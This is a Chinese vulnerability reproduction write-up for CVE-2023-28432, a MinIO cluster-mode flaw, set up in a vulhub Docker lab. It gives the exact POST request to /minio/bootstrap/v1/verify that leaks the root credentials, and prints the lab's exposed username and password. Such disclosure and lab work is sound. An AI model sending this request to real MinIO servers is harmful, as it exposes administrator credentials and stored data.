一、漏洞描述
Minio 是一个开源的对象存储服务,它是一个完全兼容 Amazon S3 的存储系统,可以用来构建可扩展的应用程序。MinIO集群模式中存在一个信息泄露漏洞。攻击者可以利用该漏洞获取存储在MinIO中的敏感数据。
二、漏洞危害等级
高
三、影响版本
RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z四、环境搭建
使用vulhub靶场
https://vulhub.org/#/environments/minio/CVE-2023-28432/
执行如下命令启动一个MinIO集群,其中包含3个以集群模式运行的服务:
docker compose up -d集群启动后,访问
http://your-ip:9001可以查看Web管理页面,访问http://your-ip:9000是API服务。五、漏洞复现
该漏洞存在于API接口 http://your-ip:9000/minio/bootstrap/v1/verify
1、打开BurpSuite抓包,然后访问http://192.168.20.15:9000/minio/bootstrap/v1/verify,其会自动跳转到console
2、更改请求方式为POST,数据包内容
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.20.15:90003、我们可以看到MINIO_ROOT_USER 和MINIO_ROOT_PASSWORD 已经暴露了。
MINIO_SECRET_KEY:minioadmin
MINIO_ROOT_PASSWORD:minioadmin-vulhub4、成功使用此用户名及密码登录网页控制台:
六、漏洞修复
目前官方已修复该漏洞,受影响用户可以升级更新到安全版本。